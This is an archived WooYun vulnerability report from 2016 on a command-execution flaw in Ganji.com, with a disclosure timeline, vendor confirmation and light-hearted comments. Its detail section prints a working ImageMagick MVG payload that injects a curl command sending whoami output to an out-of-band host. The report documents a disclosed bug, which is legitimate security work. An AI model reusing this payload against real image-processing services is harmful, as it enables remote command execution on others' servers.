当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205411

漏洞标题:赶集网主站命令执行

相关厂商:赶集网

漏洞作者: 紫霞仙子

提交时间:2016-05-05 19:01

修复时间:2016-06-20 17:00

公开时间:2016-06-20 17:00

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

详细说明:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl `whoami`.ganji.**.info")'
pop graphic-context

漏洞证明:

20160505185407.png


20160505185446.png

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-06 16:58

厂商回复:

感谢关注赶集安全,问题已在修复中。
PS:仙子我也爱你!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-05 19:03 | prolog ( 普通白帽子 | Rank:939 漏洞数:195 )

    诈尸了

  2. 2016-05-05 19:10 | secart ( 实习白帽子 | Rank:40 漏洞数:8 | 这个人很懒,什么都没留。)

    顶一个!

  3. 2016-05-05 19:14 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    关注

  4. 2016-05-05 19:28 | 58同城(乌云厂商)

    仙子我爱你!

  5. 2016-05-05 19:30 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    大家快来看,示爱了,要面基了。。。。@58同城

  6. 2016-05-05 19:38 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | Tr3jer@Gmail.c...)

  7. 2016-05-05 19:53 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    @58同城 额,下次不敢见你了

  8. 2016-05-05 20:01 | 包包不是包 ( 路人 | Rank:9 漏洞数:5 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)

    紫霞我爱你!

  9. 2016-05-05 22:45 | 沦沦 ( 普通白帽子 | Rank:651 漏洞数:149 | 爱老婆,爱生活|脚步不能停要一直向前走【...)

    紫霞紫霞我的最爱

  10. 2016-05-06 14:19 | Mark ( 实习白帽子 | Rank:64 漏洞数:9 | You deserve more)

    @58同城 额,下次不敢见你了

  11. 2016-05-06 16:59 | hecate ( 普通白帽子 | Rank:823 漏洞数:128 | ®高级安全工程师 | WooYun认证√)

    PS:仙子我也爱你!